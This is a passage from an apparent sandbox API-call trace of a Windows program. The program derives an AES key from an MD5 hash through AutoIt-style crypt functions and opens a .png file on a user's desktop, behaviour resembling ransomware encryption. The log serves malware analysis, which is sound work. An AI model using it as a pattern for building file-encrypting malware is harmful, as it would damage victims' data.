lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bwOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wOHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OHNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HNgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gAEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AEohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ohzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hzwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zwnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wnBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nBTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BTD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TD\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\bqTv.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0075.138] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0075.138] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0075.138] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0075.138] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0075.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0075.139] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ec0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ec0c) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.139] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png", lpFindFileData=0x61e870 | out: lpFindFileData=0x61e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb2fb80, ftCreationTime.dwHighDateTime=0x1d5e34e, ftLastAccessTime.dwLowDateTime=0x2454b2e0, ftLastAccessTime.dwHighDateTime=0x1d5e10e, ftLastWriteTime.dwLowDateTime=0x2454b2e0, ftLastWriteTime.dwHighDateTime=0x1d5e10e, nFileSizeHigh=0x0, nFileSizeLow=0x44c1, dwReserved0=0x61e9c0, dwReserved1=0x657690, cFileName="bqTv.png", cAlternateFileName="")) returned 0x6b89f8 [0075.139] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.139] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.139] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.139] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.139] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.139] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.139] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0075.139] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.139] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0075.139] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.139] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.140] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.140] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.140] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.140] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0075.140] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.140] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0075.141] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.141] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.141] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.141] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.141] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.141] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.141] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.141] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.141] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.141] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.142] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.142] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.142] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.142] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.142] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.142] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.142] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.143] CryptHashData (hHash=0x6b8b38, pbData=0x6f9748, dwDataLen=0x16, dwFlags=0x1) returned 1 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.143] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.143] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.143] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.143] CryptDeriveKey (in: hProv=0x696ad0, Algid=0x660e, hBaseData=0x6b8b38, dwFlags=0x1, phKey=0x61e2c0 | out: phKey=0x61e2c0*=0x6b8ab8) returned 1 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.143] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.143] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.143] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.143] CryptDestroyHash (hHash=0x6b8b38) returned 1 [0075.144] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.144] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\bqTv.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\bqtv.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.144] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.144] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61e9f8 | out: lpNewFilePointer=0x0) returned 1 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dba8 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1070 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1070 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.144] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.144] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b38 [0075.144] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0075.145] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dba8 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb428 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.145] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x699838 [0075.145] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.146] 